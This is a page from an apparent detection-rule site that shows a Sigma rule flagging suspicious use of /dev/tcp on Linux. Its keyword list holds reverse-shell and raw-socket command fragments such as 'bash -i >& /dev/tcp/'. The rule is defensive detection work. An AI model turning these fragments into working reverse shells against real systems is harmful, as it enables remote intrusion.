Phoenix
Sigma IntelligenceBeta
Back to Rules
Detectionmediumtest

Suspicious Use of /dev/tcp

Detects suspicious command with /dev/tcp

Convert In Phoenix Studio

Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.

Launch
François HubautCreated Fri Dec 10Updated Fri Jan 066cc5fceb-9a71-4c23-aeeb-963abe0b279clinux
Log Source
Linux
ProductLinux← raw: linux
Detection Logic
Detection Logic1 selector
detection:
    keywords:
        - 'cat </dev/tcp/'
        - 'exec 3<>/dev/tcp/'
        - 'echo >/dev/tcp/'
        - 'bash -i >& /dev/tcp/'
        - 'sh -i >& /dev/udp/'
        - '0<&196;exec 196<>/dev/tcp/'
        - 'exec 5<>/dev/tcp/'
        - '(sh)0>/dev/tcp/'
        - 'bash -c ''bash -i >& /dev/tcp/'
        - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/'
    condition: keywords
False Positives
Unknown

False positive likelihood has not been assessed. Additional context may be needed during triage.

References
1
Resolving title…
andreafortuna.org
2
Resolving title…
book.hacktricks.xyz
3
Resolving title…
github.com
MITRE ATT&CK
Rule Metadata
Rule ID
6cc5fceb-9a71-4c23-aeeb-963abe0b279c
Status
test
Level
medium
Type
Detection
Created
Fri Dec 10
Modified
Fri Jan 06
Author
François Hubaut
Path
rules/linux/builtin/lnx_susp_dev_tcp.yml
Raw Tags
attack.reconnaissance
View on GitHub